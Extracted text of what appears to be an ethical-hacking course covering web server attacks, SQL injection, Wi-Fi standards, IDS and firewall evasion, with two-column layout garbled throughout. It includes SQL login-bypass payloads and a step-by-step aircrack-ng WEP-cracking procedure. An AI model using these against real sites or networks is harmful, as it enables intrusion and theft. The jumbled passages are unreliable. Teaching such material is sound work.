Hijacking Use cookie in a secure manner where possible. This includes knowing their vulnerabilities, as well as understanding the
Cryptography Use built-in encryption routines that include types of attacks including Internet Information Server (IIS) Unicode exploits.
secure key management. Data Protection appli- In addition, you should know when to use patch-management techniques and
cation programming interface (DPAPI) is an ex- understand the methods used to harden web servers.
ample of an encryption service provided on Win-
dows 2000 and later operating systems where
the operating system manages the key.
List the Types of Web Server Vulnerabilities:
Use strong random key generation functions and
store the key in a restricted location for exam- Web servers, like other systems, can be compromised by a hacker. The follow-
ple, in a registry key secured with a restricted ing vulnerabilities are most commonly exploited in web servers:
ACL if you use an encryption mechanism that
Misconfiguration of the web server software
requires you to generate or manage the key.
Encrypt the encryption key using DPAPI for add- Operating system or application bugs or flaws in programming code
ed security.
Vulnerable default installation of operating system and web server soft-
Directory traversal Use strong access controls to protect data in ware and/or lack of patch management to update operating system or
persistent stores to ensure that only authorized
users can access and modify the data. web server software
Use role-based security to differentiate between Lack of or not following proper security policies and procedures
users who can view data and users who can
modify data. Hackers exploit these vulnerabilities to gain access to the web server. Because
Parameter/Form Field Validity Check web servers are located in a Demilitarized Zone (DMZ), which is a publicly
tampering accessible area between two packet filtering devices and can be more easily
Cookie Snooping Use an encrypted communication channel pro- accessed by the organizations client systems, an exploit of a web server offers
vided by SSL whenever an authentication cookie a hacker easier access to internal systems or databases.
is transmitted.
Use a cookie timeout to a value that forces au-
thentication after a relatively short time interval. Attacks against Web Servers :
Although this doesnt prevent replay attacks, it
reduces the time interval in which the attack- The most visible type of attack against web servers is defacement. Hackers
er can replay a request without being forced to deface websites for sheer joy and an opportunity to enhance their reputations.
re-authenticate because the session has timed
out. Defacing a website means the hacker exploits vulnerability in the operating
system or web server software and then alters the website files to show that
Log Tampering Secure log files by using restricted ACLs.
the site has been hacked. Often the hackers display their hacker name on the
Relocate system log files away from their default websites home page. Common website attacks that enable a hacker to deface
locations. a website include the following:
Digitally sign and stamp logs.
Capturing administrator credentials through man-in-the-middle at-
Error message Website Cloaking capabilities make enterprise tacks.
Interception web resource invisible to attackers
Web Services At- Turn off web services that are not required for Revealing an administrator password through a brute-force attack.
tack regular operation
Using a DNS attack to redirect users to a different web server.
Provision for multiple layer of protection
Compromising an FTP or e-mail server.
Block all unknown path.
Zero-Day Attacks Enforce stringent security policies Exploiting web application bugs that result in a vulnerability.
Deploy firewall Misconfiguring web shares.

Taking advantages of weak permissions.

Rerouting a client after a firewall or router attack. SQL Injection
Using SQL injection attacks (if the SQL server and web server are the
same system).
Objective
Using Telnet or Secure Shell (SSH) intrusion.
Introduction
Carrying out URL poisoning; this redirects the user to a different URL.
Threats of SQL Injection
Using web server extension or remote service intrusion.
SQL Injection Query
For cookie-enabled security, intercept the communication between the
client and the server and change the cookie to make the server believe SQL Injection Vulnerabilities
that there is a user with higher privileges.
Types of SQL Injection
Countermeasures
8 Web Server Hardening Methods
A web server administrator can do many things to harden a server (in-
crease its security). The following are ways to increase the security of Introduction
the web server:
Web applications allow legitimate website visitors to submit and retrieve data
Rename the administrator account and use a strong password. to/from a database over the Internet using their preferred web browser. Da-
tabases are central to modern websites they store data needed for websites
Disable default websites and FTP sites.
to deliver specific content to visitors and render information to customers,
Remove unused applications from the server, such as WebDAV. suppliers, employees and a host of stakeholders. User credentials, financial
and payment information, company statistics may all be resident within a
Disable directory browsing in the web servers configuration settings. database and accessed by legitimate users through off-the-shelf and custom
Add a legal notice to the site to make potential attackers aware of the web applications. Web applications and databases allow you to regularly run
implications of hacking the site. your business.
Apply the most current patches, hotfixes and service packs to the oper- A SQL injection attack consists of insertion or injection of a SQL query
ating system and web server software. via the input data from the client to the application. A successful SQL
injection exploit can read sensitive data from the database, modify database
Perform bounds-checking on input for web forms and query strings to data (Insert/Update/Delete), execute administration operations on the data-
prevent buffer overflow or malicious input attacks. base (such as shutdown the DBMS), recover the content of a given file present
Disable remote administration. on the DBMS file system and in some cases issue commands to the operat-
ing system. SQL injection attacks are a type of injection attack in which SQL
Use a script to map unused file extensions to a 404 (File not found) commands are injected into data-plane input in order to effect the execution
error message. of predefined SQL commands.
Enable auditing and logging. SQL injection is a code injection technique that exploits a security vul-
nerability occurring in the database layer of an application. The vulnera-
Use a firewall between the web server and the Internet and allow only
bility is present when user input is either incorrectly filtered for string literal
necessary ports (such as 80 and 443) through the firewall.
escape characters embedded in SQL statements or user input is not strongly
Replace the GET with POST method when sending data to a web server. typed and thereby unexpectedly executed.

many organizations to store confidential data. This makes a SQL server a high
value target and therefore a system that is very attractive to hackers.
Threats of SQL Injection
SQL injection attacks allow attackers to spoof identity, tamper with existing
data, cause repudiation issues such as voiding transactions or changing bal-
ances, allow the complete disclosure of all data on the system, destroy the
data or make it otherwise unavailable, and become administrators of the da-
tabase server.
SQL Injection is very common with PHP and ASP applications due to the
prevalence of older functional interfaces. Due to the nature of programmatic
interfaces available, J2EE and ASP.NET applications are less likely to have
SQL injection is an attack in which malicious code is inserted into strings that easily exploited SQL injections.
are later passed to an instance of SQL Server for parsing and execution. Any
procedure that constructs SQL statements should be reviewed for injection Not preventing SQL Injection attacks leaves your business at great risk of:
vulnerabilities because SQL Server will execute all syntactically valid queries Changes to or deletion of highly sensitive business information.
that it receives. Even parameterized data can be manipulated by a skilled and
determined attacker. Customer information such as social security numbers, addresses, and
credit card numbers being stolen
The primary form of SQL injection consists of direct insertion of code into us-
er-input variables that are concatenated with SQL commands and executed. Financial losses
A less direct attack injects malicious code into strings that are destined for
storage in a table or as metadata. When the stored strings are subsequently Brand damage
concatenated into a dynamic SQL command, the malicious code is executed.
Theft of intellectual property
The injection process works by prematurely terminating a text string and
appending a new command. Because the inserted command may have addi- Legal liability and fines
tional strings appended to it before it is executed, the malefactor terminates
the injected string with a comment mark --. Subsequent text is ignored at
execution time. SQL Injection Query
During a SQL injection attack, malicious code is inserted into a web form field SQL Injection is a hacking technique which attempts to pass SQL commands
or the websites code to make a system execute a command shell or other ar- or statements through a web application for execution by the backend data-
bitrary commands. Just as a legitimate user enters queries and additions to base. If not sanitized properly, web applications may result in SQL Injection
the SQL database via a web form, the hacker can insert commands to the SQL attacks that allow hackers to view information from the database and/or even
server through the same web form field. wipe it out.
SQL Injection is one of the many web attack mechanisms used by hackers to Such features as login pages, support and product request forms, feedback
steal data from organizations. It is perhaps one of the most common applica- forms, search pages, shopping carts and the general delivery of dynamic con-
tion layer attack techniques used today. It is the type of attack that takes tent, shape modern websites and provide businesses with the means neces-
advantage of improper coding of your web applications that allows hacker to sary to communicate with prospects and customers. These website features
inject SQL commands into say a login form to allow them to gain access to the are all susceptible to SQL Injection attacks which arise because the fields
data held within your database. available for user input allow SQL statements to pass through and query the
database directly.
For example, an arbitrary command from a hacker might open a command
prompt or display a table from the database. A database table may contain Before launching a SQL injection attack, the hacker determines whether the
personal information such as credit card numbers, social security numbers configuration of the database and related tables and variables is vulnerable.
or passwords. SQL servers are very common database servers and used by The steps to determine the SQL servers vulnerability are as follows:

is allowed access. In other words, the web application that controls the login
page will communicate with the database through a series of planned com-
1. Using your web browser, search for a website that uses a login page or
mands so as to verify the username and password combination. On verifica-
other database input or query fields (such as an I forgot my password
tion, the legitimate user is granted appropriate access.
form). Look for web pages that display the POST or GET HTML com-
mands by checking the sites source code. Through SQL Injection, the hacker may input specifically crafted SQL com-
mands with the intent of bypassing the login form barrier and seeing what
2. Test the SQL server using single quotes (). Doing so indicates whether
lies behind it. This is only possible if the inputs are not properly sanitized and
the user-input variable is sanitized or interpreted literally by the server.
sent directly with the SQL query to the database. SQL Injection vulnerabilities
If the server responds with an error message that says use a=a(or
provide the means for a hacker to communicate directly to the database.
something similar), then its most likely susceptible to a SQL injection
attack. The technologies vulnerable to this attack are dynamic script languages in-
cluding ASP, ASP.NET, PHP, JSP and CGI. All an attacker needs to perform
3. Use the SELECT command to retrieve data from the database or the
an SQL Injection hacking attack is a web browser, knowledge of SQL queries
INSERT command to add information to the database.
and creative guess work to important table and field names. The sheer sim-
4. SELECT Count(*) FROM users WHERE UserName=Blah 1=1 plicity of SQL Injection has fuelled its popularity.
Here are some examples of variable field text you can use on a web form to
test for SQL vulnerabilities:
SQL Server Vulnerabilities Blah or 1=1--
How does an attacker compromise your SQL server? Login:blah or 1=1--
Before a web site can be compromised, an attacker needs to find applications Password::blah or 1=1--
that are vulnerable to SQL injection using queries to learn the SQL applica-
tion methods and its response mechanisms. These commands and similar variations may allow the bypassing of a login
depending on the structure of the database. When entered in a form field, the
The attacker has two ways to identify SQL injection vulnerabilities: commands may return many rows in a table or even an entire database table
because the SQL server is interpreting the terms literally. The double dashes
o Error messages: the attacker constructs the correct SQL syntax
near the end of the command tell SQL to ignore the rest of the command as
based on errors messages propagated from the SQL server via the
a comment.
front-end web application. Using the errors received, the hacker
learns the internal SQL database structure and how to attack by in- The vulnerability is present when user input is either incorrectly filtered for
jecting SQL queries via the Web application parameters. string literal escape characters embedded in SQL statements or user input is
not strongly typed and thereby unexpectedly executed. Web pages which ac-
o Blindfolded Injection: this technique is utilized by hackers in situ- cept parameters from user and make SQL query to the database are targeted
ations where no error messages or response content is returned from
the database. In these cases, the attacker lacks the ability to learn
the backend SQL queries in order to balance the SQL injection query.
In the lack of database content output within the Web application,
the attacker is also challenged with finding a new way of retrieving
the data.
SQL Injection: A Simple Example
Take a simple login page where a legitimate user would enter his username
and password combination to enter a secure area to view his personal details
or upload his comments in a forum.
When the legitimate user submits his details, an SQL query is generated from
these details and submitted to the database for verification. If valid, the user
.

Types of SQL Injection SQL INJECTION COUNTERMEASURES
There are a number of categorized SQL injection types that can be exe-
cuted with a web-browser. They are:
Poorly Filtered Strings

SQL injections based on poorly filtered strings are caused by user input
that is not filtered for escape characters. This means that a user can
input a variable that can be passed on as an SQL statement, resulting
in database input manipulation by the end user.
Signature Evasion
Many SQL injections will be somewhat blocked by intrusion detection
and intrusion prevention systems using signature detection rules. Com-
mon programs that detect SQL injections are mod_security for Apache SQL Injection flaws are introduced when software developers create dynamic
and Snort. These programs arent fool proof and as such, the signatures database queries that include user supplied input. To avoid SQL injection
can be evaded. flaws is simple. Developers need to either:
a) Stop writing dynamic queries; and/or

Blind SQL Injection
Most good production environments do not allow you to see output in b) Prevent user supplied input which contains malicious SQL from affect-
the form of error messages or extracted database fields whilst conduct- ing the logic of the executed query.
ing SQL injections, these injections are known as Blind SQL Injections.
They are titled Partially Blind Injections and Totally Blind Injections.
Partially Blind Injections are injections where you can see slight chang- Primary Defences:
es in the resulting page, for instance, an unsuccessful injection may
redirect the attacker to the main page, where a successful injection will Use of Prepared Statements (Parameterized Queries)
return a blank page.
Prepared statements ensure that an attacker is not able to change the
Totally Blind Injections are unlike Partially Blind Injections in that they
intent of a query, even if SQL commands are inserted by an attacker. In
dont produce difference in output of any kind. This is still however
injectable, though its harder to determine whether an injection is ac- the safe example below, if an attacker were to enter the userID of tom
tually taking place or 1=1, the parameterized query would not be vulnerable and would
instead look for a username which literally matched the entire string
tom or 1=1.
Use of Stored Procedures
The difference between prepared statements and stored procedures is

that the SQL code for a stored procedure is defined and stored in the
database itself and then called from the application. Both of these tech-
niques have the same effectiveness in preventing SQL injection.

Additional Defences: A Royal Navy spokesperson confirmed the site had been compromised and
said: There has been no malicious damage.
Least Privilege: To minimize the potential damage of a successful SQL in-
They added that as a precaution, the site has been temporarily suspended
jection attack, minimize the privileges assigned to every database account in and that security teams were investigating how the hacker got access. They
your environment. Do not assign DBA or admin type access rights to your said no confidential information had been disclosed.
application accounts. Make sure that accounts that only need read access The Royal Navy website currently shows a static image on which is a black
are only granted read access to the tables they need access to. If an account box bearing the text: Unfortunately the Royal Navy website is undergoing
only needs access to portions of a table, consider creating a view that limits essential maintenance. Please visit again soon.
access to that portion of the data and assigning the account access to the TinKode first mentioned the attack on his Twitter stream and added a web
view instead, rather than the underlying table. Rarely, if ever, grants create link to a page that contained more details about what he had found.
or delete access to database accounts. This text file contained the names of the sites administrators and many reg-
ular users.
SQL injection is not the only threat to your database data. Attackers can
simply change the parameter values from one of the legal values they are The attack used to get the information compromises the database used to run a
presented with, to a value that is unauthorized for them, but the application site by sending malformed queries and analysing the responses this generates.
itself might be authorized to access. As such, minimizing the privileges grant- Graham Cluley, senior security analyst at Sophos, said the incident was im-
ed to your application will reduce the likelihood of such unauthorized access mensely embarrassing, particularly in the wake of the recent security review
where hacking and cybercrime attacks were given the top priority.
attempts, even when an attacker is not trying to use SQL injection as part of
their exploit. Mr Cluley said the hacker had apparently gained access to the Navys blog,
Jackspeak and to an area called Global Ops.
CASE STUDY: Royal Navy website attacked by Romanian hacker Hes obviously more of a show-off type of hacker rather than malicious, said
Mr Cluley.
But if hed wanted to he could have inserted links which would have tak-
en the websites readers to malicious sites. Tinkode has apparently carried
out 52 separate defacements of websites in the last 12 months, according to
website ZoneH. Targets included everything from small businesses to adult
websites. He has also uncovered vulnerabilities in high-profile sites such as
YouTube.
CASE STUDY: US man stole 130m card numbers
The Royal Navy website has been suspended while security teams investigate
The Royal Navys website has been hacked by a suspected Romanian hacker
known as TinKode.
The hacker gained access to the website on 5 November using a common at- US prosecutors have charged a man with stealing data relating to 130 mil-
tack method known as SQL injection. lion credit and debit cards.
TinKode published details of the information he recovered, which included Officials say it is the biggest case of identity theft in American history. They
user names and passwords of the sites administrators. say Albert Gonzalez, 28, and two un-named Russian co-conspirators hacked

into the payment systems of retailers, including the 7-Eleven chain. asy setup: You dont have to string cables, so installation can be
E
quick and cost-effective.
Prosecutors say they aimed to sell the data on. If convicted, Mr Gonzalez
faces up to 20 years in jail for wire fraud and five years for conspiracy. He xpandable: You can easily expand wireless networks with existing
E
would also have to pay a fine of $250,000 (150,000) for each of the two equipment, while a wired network might require additional wiring.
charges.
ost: Because wireless networks eliminate or reduce wiring costs, they
C
can cost less to operate than wired networks.
Standard attack
Mr Gonzalez used a technique known as an SQL injection attack to access Reasons to switch Wireless
the databases and steal information, the US Department of Justice (DoJ)
1. Increased mobility and collaboration
said. The method is believed to involve exploiting errors in programming to
access data. Edward Wilding, a fraud investigator, told the BBC that this Roam without losing your connection.
method was a pretty standard way for fraudsters to try to access personal
data. He added that this case probably involved extremely well researched, Work together more effectively.
especially configured codes, not standard attack codes downloaded from the 2. Improved responsiveness
internet. Mr. Wilding said there was little consumers could do to protect
themselves against this kind of fraud. Connect to the information you need when you need it.
Internet and telephone transactions using credit cards were most vulnera- Provide better service.
ble, he said, though added it was a failure of corporations, not customers. 3. Better access to information
Michelle Whiteman, from anti-fraud organization Financial Fraud Action UK,
said that consumers must check their bank statements regularly and flag Connect hard-to-reach areas.
up any suspicious transactions to their bank. She said that online, tele-
Improve your process.
phone and mail order fraud were on the increase, along with fraud commit-
ted abroad on UK cards, according to figures released in March. 4. Easy network expansion
Add users quickly.
Hacking Wireless Network Expand your network cost effectively.
Introduction: 5. Enhanced guest access
A wireless network is any type of network that uses wireless data connec- Give secure network access to family & friends.
tions for connecting network nodes. In simple terms, any communication/
Offer a value added service
electronic devices that are not connected by cables of any kind.

The basis of wireless systems are radio frequency waves.
Advantages:
Home or Small businesses can experience many benefits from a wireless
network, including:
onvenience: Access your network resources from any location within
C
your wireless networks coverage area or from any Wi-Fi hotspot.
obility: Youre no longer tied to your desk, as you were with a wired
M
connection. You and your employees can go online in conference room
meetings, for example.
roductivity: Wireless access to the Internet and to your companys
P
key applications and resources helps your staff get the job done and
encourages collaboration.

with a central point will be called as Point-to-point.
3. Multipoint-to-multipoint: When any node of the network communicate

with any other node of network will be called as multipoint-to-multipoint
(also referred to as an ad-hoc or mesh network).
Wireless Network Architecture
Wireless networks can be arranged in one of these three logical configura-

tions:
1. Point-to-point: The communication connection between two nodes or
endpoints will be called as Point-to-point.
Wi-Fi Protocols & Functioning

Wi-Fi stands for Wireless Fidelity.
There are some protocols created and maintained by IEEE (Institute of Elec-
tric & Electronic Engineers) an extension 802.11 (Standard) which would
work on the wireless mode. This committee was founded in the year 1990
and was headed by Victor Hayes, Father of Wi-Fi. They collaborated with
networking giants such as Nokia, Motorola etc. and the committee intro-
duced WLAN legacy of Wi-Fi in the year 1997.
The hype created by the standard was so high that many manufacturers
2. Point-to-multipoint: When more than one connection communicates had already started shipping gadgets with the standard before the standard
became official.

Different Wi-Fi Protocols and Data Rates: 802.11g:
Protocol Frequency Signal Max data rate Released in 2003
Legacy 802.11 2.4 GHz FHSS or DHSS 2 Mbps ata rates with varying modulation types: 6, 9, 12, 18, 24, 36, 48 and
D
802.11a 5 GHz OFDM 54 Mbps 54 Mbps; can revert to 1, 2, 5.5, and 11 Mbps using DSSS and CCK
802.11b 2.4 GHz HR-DSSS 11 Mbps rthogonal frequency-division multiplexing (OFDM) with 52 sub-carrier
O
channels; backwards compatible with 802.11b using DSSS and CCK
802.11g 2.4 GHz OFDM 54 Mbps
hree non-overlapping channels in industrial, scientific, medical (ISM)
T
802.11n 2.4 or 5 GHz OFDM 600 Mbps* frequency band at 2.4 GHz
802.11ac 5 GHz 256-QAM 1.3 Gbps 802.11n:
*Note: Theoretically
ata rates with varying modulation types: 1, 2, 5.5, 6, 9, 11, 12, 18,
D
24, 36, 48, 54 Mbps
Legacy 802.11: rthogonal frequency-division multiplexing (OFDM) using multiple-in-
O
put/multiple-output (MIMO) and channel bonding (CB)
Released in 1997
T
Two raw data rates of 1 and 2 Mbps
frequency band at 2.4 GHz
requency hopping spread spectrum (FHSS) or direct-sequence spread
F
2 non-overlapping unlicensed national information infrastructure
1
spectrum (DSSS)
(UNII) channels in 5 GHz frequency band with and without CB
T
802.11ac:
frequency band at 2.4 GHz
Released in January 2014
riginally defined carrier sense multiple access with collision avoid-
O
ance (CSMA-CA ata rates varying modulation types; 200 Mbps, 400 Mbps, 433 Mbps,
D
600 Mbps, 867 Mbps, 1.3 Gbps.
802.11a
2
Released in 1999
(UNII) channels in 5 GHz frequency band
ata rates with varying modulation types: 6, 9, 12, 18, 24, 36, 48 and
D
54 Mbps
Radio Modes
rthogonal frequency-division multiplexing (OFDM) with 52 sub-carri-
O
er channels 802.11 Cards can be operated in one of these modes.
1 1. Master (AP): Master mode (also called AP or infrastructure mode) is
(UNII) channels in 5 GHz frequency band used to create a service that looks like a traditional access point (AP). The
wireless card creates a network with a specified name (called the SSID Ser-
802.11b:
vice Set Identifier) and channel and offers network services on it. Wireless
Released in 1999 cards in master mode can only communicate with cards that are associated
with it in managed mode.
Data rates with varying modulation types: 1, 2, 5.5 and 11 Mbps
2. Managed mode: Managed mode is sometimes also referred to as cli-
High-rate direct-sequence spread spectrum (HR-DSSS) ent mode. Wireless cards in managed mode will join a network created by
T a master, and will automatically change their channel to match it. Clients
frequency band at 2.4 GH using a given AP are said to be associated with it. Managed mode cards do
not communicate with each other directly and will only communicate with
an associated master.
3. Ad-hoc mode: Ad-hoc mode creates a multipoint-to-multipoint net-

work when there is no master or AP available. In ad-hoc mode, each wireless the more modern AES encryption. Devices that support AES will almost
card communicates directly with its neighbors. Nodes must be in range of always support WPA2, while devices that require WPA1 will almost never
each other to communicate and must agree on a network name and chan- support AES encryption. This option makes very little sense.
nel.
WPA2-PSK (TKIP): This uses the modern WPA2 standard with older
4. Monitor mode: Monitor mode is used by some tools (such as Kismet) TKIP encryption. This isnt secure, and is only a good idea if you have older
to passively listen to all radio traffic on a given channel. This is useful for devices that cant connect to a WPA2-PSK (AES) network.
analyzing problems on a wireless link or observing spectrum usage in the
WPA2-PSK (AES): This is the most secure option. It uses WPA2, the
local area. Monitor mode is not used for normal communications.
latest Wi-Fi encryption standard and the latest AES encryption protocol. On
devices with less confusing interfaces, the option marked WPA2 or WPA2-
PSK will probably just use AES, as thats a common-sense choice.
802.11 Radio modes in action:
WPAWPA2-PSK (TKIP/AES) (recommended): This enables both WPA
and WPA2 with both TKIP and AES. This provides maximum compatibility
with any ancient devices you might have, but also ensures an attacker can
breach your network by cracking the lowest-common-denominator encryp-
tion scheme. This TKIP+AES option may also be called WPA2-PSK mixed
mode.
Wireless Router Configuration

Below points are the steps for configuring Wi-Fi routers.
Purchase a wireless router. Routers come in all shapes and sizes.
Compare features to find the router that is right for you. If you have more
area that you need to cover or have lots of walls in your home, youll need a
router that offers the option of upgrading antenna(s) with high gain types - if
not supplied in the box. If more than one wireless device will be connecting
at the same time at different speeds, a MiMo type router is recommended.
All modern routers should support 802.11n, or Wireless-N). This is
the most stable, offers the fastest speeds and is backwards compatible with
older standards such as 802.11g.
Connect at least one computer via Ethernet. You will need at least one
Wi-Fi Security Modes
computer connecting via Ethernet cable in order to adjust your router set-
Open (risky): Open Wi-Fi networks have no passphrase. You tings. You can disconnect this computer afterwards if you want to connect
shouldnt set up an open Wi-Fi network seriously, you could have your wirelessly.
door busted down by police.
Find the IP address of the router. If this is a new installation or new
WEP 64 (risky): The old WEP encryption standard is vulnerable and router, determine the default IP address that may be printed on a label af-
shouldnt be used. Its name, which stands for Wired Equivalent Privacy, fixed to the router or in the documentation. If you cant find the routers IP
now seems like a joke. address anywhere, you can do a web search for the router model to see what
the default address is.
WEP 128 (risky): WEP with a larger encryption key size isnt really
any better. IP addresses are formatted as four groups of up to three digits, sepa-
rated by periods.
WPA-PSK (TKIP): This is basically the standard WPA or WPA1, en-
cryption. Its been superseded and isnt secure. Most default IP addresses are 192.168.1.1, 192.168.0.1 or
192.168.2.1.
WPA-PSK (AES): This chooses the older WPA wireless protocol with

Open the browser and type the routers IP address to access configura- Here I have got two interfaces i.e. Wlan0 & eth0 or may be different. Now, we
tion page. can run the following four commands one by one. And see the output.
Type the default username and password of the router. If this is a new 3) airmon-ng stop Wlan0)
installation or new router, determine the default username and password
4) ifconfigWlan0 down
that may be printed on a label affixed to the router or in the documentation.
(admin & admin) 5) Macchanger --mac 00:11:22:33:44:55 Wlan0
After login, find Wi-Fi tab from above or left side within configuration 6) airmon-ng start Wlan0
page.
7) airmon-ng Wlan0 up
Set SSID (network name).
Set security as WPA-PSK & WPA2-PSK
Assign password as per your comfort but recommended password
consist of at least 10-15 characters which consist of alphabets, special char-
acters and numbers.
Click on submit to apply all the manual configuration set by you.
Hacking Wireless Network

Its important to secure your wireless network with WPA2 encryption and
a strong passphrase. But what sort of attacks are you actually securing it
against? Heres how attackers crack encrypted wireless networks.
This isnt a how to crack a wireless network guide. This is not to walk you
through the process of compromising a network But for you to understand
how someone might compromise your network. Now we can see how many SSID are available but our target is to detect
SSID Raj. See the fallowing command and its output.
8) airodump-ng mon0 (mon0 mean monitoring the SSID)
Steps:
1) Firstly, start Backtrack 5 or Kali Linux (OS).
2) Airmon-ng
To see a list of wireless networks around us. Once we will see the Raj = SSID
then we can, hit Ctrl+C to stop the list. Highlight the row pertaining to the
network of interest i.e. Raj and we can note two things its MAC address its
12 characters based on hex and its channel no (in the column labelled CH).

Now were going to watch whats going on with that Raj network we chose The WEP key appears next to KEY FOUND. Drop the colons and enter it to
and capture that information to a file. We can open new console and write log onto the network. Now the intruder found the key for SSID Raj, attacker
following command. can attack clients connected to the network to access free internet connec-
tion as well as steal data from the network.
Evading IDS, Firewall and Honeypot
9) airodump-ng -c (Auto) -w (file name) --bssid (WLAN)
Intrusion Detection Systems (IDS)
Where (Auto) is your networks channel, and (Raj) is the SSID we just cop-
ied to clipboard. We can use the Shift+Insert key combination to paste it
into the command. Enter anything descriptive for (file name). I chose Raj,
which is the networks name we are cracking.
Once we collect enough data packets, its the moment of truth. Launch a an-
other Console/terminal and run the following command to crack the pass- An intrusion detection system (IDS) inspects all inbound and outbound net-
word from collected data. work activity and identifies suspicious patterns that may indicate a network
or system attack from someone attempting to break into or compromise a
system.
10) aircrack-ng -b (Raj) (Raj.cap). Here the filename should be whatever An IDS is also referred as packet-sniffer, which intercepts packets travel-
we entered above for (Raj.cap). You can browse to Home directory to see it; ling along various communication mediums and protocols, usually TCP/IP.
its the one with .cap as the extension.
Types of IDS
There are two main types of systems in which IDS can be used: Network,
Host and Log File Monitoring.
NIDS
Network Intrusion Detection Systems are placed at a strategic point or
points within the network to monitor traffic to and from all devices on the
network. Ideally you would scan all inbound and outbound traffic; however,
doing so might create a bottleneck that would impair the overall speed of the
network.
If we didnt get enough data, aircrack will fail and tell you to try again with
more.

HIDS The terms fail-open and fail-closed are most often heard within the con-
text of firewalls, which are access-control devices for networks. A fail-open
Host Intrusion Detection Systems are run on individual hosts or devices on
firewall stops controlling access to the network when it crashes, but leaves
the network. A HIDS monitors the inbound and outbound packets from the
the network available. An attacker that can crash a fail-open firewall can
device only and will alert the user or administrator if suspicious activity is
bypass it entirely. Good firewalls are designed to fail-closed, leaving the
detected.
network completely inaccessible (and thus protected) if they crash.
Ways to detect Intrusions
Network ID systems are passive. They do not control the network or main-
All Intrusion Detection Systems uses following detection techniques: tain its connectivity in any way. As such, a network IDS is inherently fail-
open.
Statistical anomaly based IDS- A statistical anomaly-based IDS
establishes a performance baseline based on normal network traffic evalua-
tions. It will then sample current network traffic activity to this baseline in
Fragmentation-Because different network media allow variable maximum
order to detect whether or not it is within baseline parameters. If the sam-
transmission units (MTUs), you must allow for the fragmentation of these
pled traffic is outside baseline parameters, an alarm will be triggered.
transmission units into differently sized packets or cells. Hackers can take
Signature-Recognition- Network traffic is examined for preconfigured advantage of this fragmentation by dividing attacking packets into smaller
and predetermined attack patterns known as signatures. Many attacks to- and smaller portions that evade the IDS but cause an attack when reassem-
day have distinct signatures. In good security practice, a collection of these bled by a target host.
signatures must be constantly updated to mitigate emerging threats.
Protocols like TCP allow any amount of data (within the limits of the IP pro-
Protocol Anomaly Detection- In this type of Detection, models are tocols maximum packet size) to be contained in each discrete packet. A
built on TCP/IP protocols using their specification. collection of data can be transmitted in one packet or in a group of them.
Because they can arrive at their destination out of order, even when trans-
mitted in order, each packet is given a number that indicates its place with-
IDS Evasion Techniques in the intended order of the stream. This is commonly referred to as a `se-
quence number, and we call collections of packets marked with sequence
Intrusion detection system evasion techniques bypass detection by creating numbers ``sequenced.
different states on the IDS and on the targeted computer. The adversary ac-
complishes this by manipulating either the attack itself or the network traf-
fic that contains the attack. Encryption-Network-based intrusion detection relies on the analysis of
These evasive techniques include flooding, fragmentation, encryption and traffic that is captured as it traverses the network from a source to its des-
obfuscation. tination. If a hacker can establish an encrypted session with its target host
using Secure Shell (SSH), Secure Socket Layer (SSL) or a virtual private
Flooding- IDSs depend on resources such as memory and processor power network (VPN) tunnel, the IDS cannot analyze the packets and the malicious
to effectively capture packets, analyse traffic and report malicious attacks. traffic will be allowed to pass. Obviously, this technique requires that the
By flooding a network with noise traffic, an attacker can cause the IDS to attacker establish a secure encrypted session with its target host.
exhaust its resources examining harmless traffic. In the meantime, while the
IDS is distracted and occupied by the volume of noise traffic, the attacker
can target its system with little or no intervention from the IDS. Obfuscation-Obfuscation, an increasingly popular evasive technique, in-
A denial of service (DOS) attack is one that is intended to compromise volves concealing an attack with special characters. It can use control char-
the availability of a computing resource. Common DOS attacks include acters such as the space, tab, backspace and delete. Also, the technique
ping floods and mail bombs. Both intended to consume disproportionate might represent characters in hex format to elude the IDS. Using Unicode
amounts of resources, starving legitimate processes. Other attacks are tar- representation, where each character has a unique value regardless of the
geted at bugs in software and are intended to crash the system. The infa- platform, program or language, is also an effective way to evade IDSs.
mous ``ping of death and teardrop attacks are examples of these. Polymorphic code is another means to circumvent signature-based IDS by
A fail-open system ceases to provide protection when it is disabled by a creating unique attack patterns, so that the attack does not have a single
DOS attack. A fail-closed system, on the other hand, leaves the network detectable signature.
protected when it is forcibly disabled.

Firewalls Firewall Identification Techniques:
The term firewall has been adopted to describe a single piece of software 1. Port Scanning:
and hardware that protects a network. It is more than just one device/func-
Because many firewalls use specific ports, identifying these open ports can
tion. It is a combination of hardware or servers, software and management
determine the firewall being employed. Examples of ports used by common
activities used to control communications between internal networks and
firewalls are given in the following list:
external networks.
Check Point Firewall -1: ports 256, 257, 258
Microsoft Proxy Server: ports 1080, 1745
BlackICE PC Protection: port 5000, ports > 1024
McAfee Firewall: port 5000
2. Firewalking:
Firewalking is an open source mapping software package that is used to deter-
mine the protocols that can pass through a router or firewall. It accomplishes
this test by setting the time to live (TTL) field of the IP header of TCP or UDP
packets to one hop greater than that of the target firewall. Then, the packets are
sent to the gateway (firewall). At each hop, the TTL is decremented until it be-
comes zero. If they are allowed through the gateway, the packets are forwarded
to the next hop. At this point, TTL becomes zero, the packet is discarded, and
a TTL exceeded in transit message is returned to the firewalking host. This
message informs the firewalking host that the packet was allowed through the
Firewalls are tools that can be used to enhance the security of computers firewall. On the other hand, if the packets are blocked, they are dropped and no
connected to a network, such as a LAN or the Internet. A firewall separates message is returned. Using this method, access information on the firewall and
a computer from the Internet, inspecting packets of data as they arrive at open ports can be determined if successive probe packets are sent.
either side of the firewall inbound to or outbound from, your computer to
determine whether it should be allowed to pass or be blocked. Thus this technique is used for testing the vulnerability of a firewall and
mapping the routers of network that are behind firewall.
Firewalls generally are controlled by a firewall policy, which is a set of rules
that defines the set of communities that can or cannot talk to each other.
Whatever make or model you buy, firewall policies can generally be ex- 3. Banner Grabbing:
pressed as a simple set of rules that specify the to and the from: Banner grabbing is a form of enumeration that obtains banner information
ALLOW <my-address any-port> to <outside-address mail port> transmitted by services such as Telnet and FTP. It is a simple method of OS
detection that helps in detecting services run by firewalls.
ALLOW <any-inside address port> to <any outside-address Web port>
DENY <anyaddress port> to <any address Web port>
Firewall Evasion techniques
The last line is the logical implementation of the paradigm Deny what is
not specifically allowed and is thoroughly good practice. Whether gathering information or launching an attack, it is generally expect-
ed that the attacker avoids detection. Techniques used are:
Firewalls have a set of rules that determines if the packet should be allowed
entry. The firewall is located at the point of entry where data attempts to
enter the computer from the Internet. But different firewalls have different
methods of inspecting packets for acceptance or rejection.

FIN Scan: A FIN scan sends TCP segments with the FIN flag set in an at- of restricting what comes into a system from the Internet, the honeypot
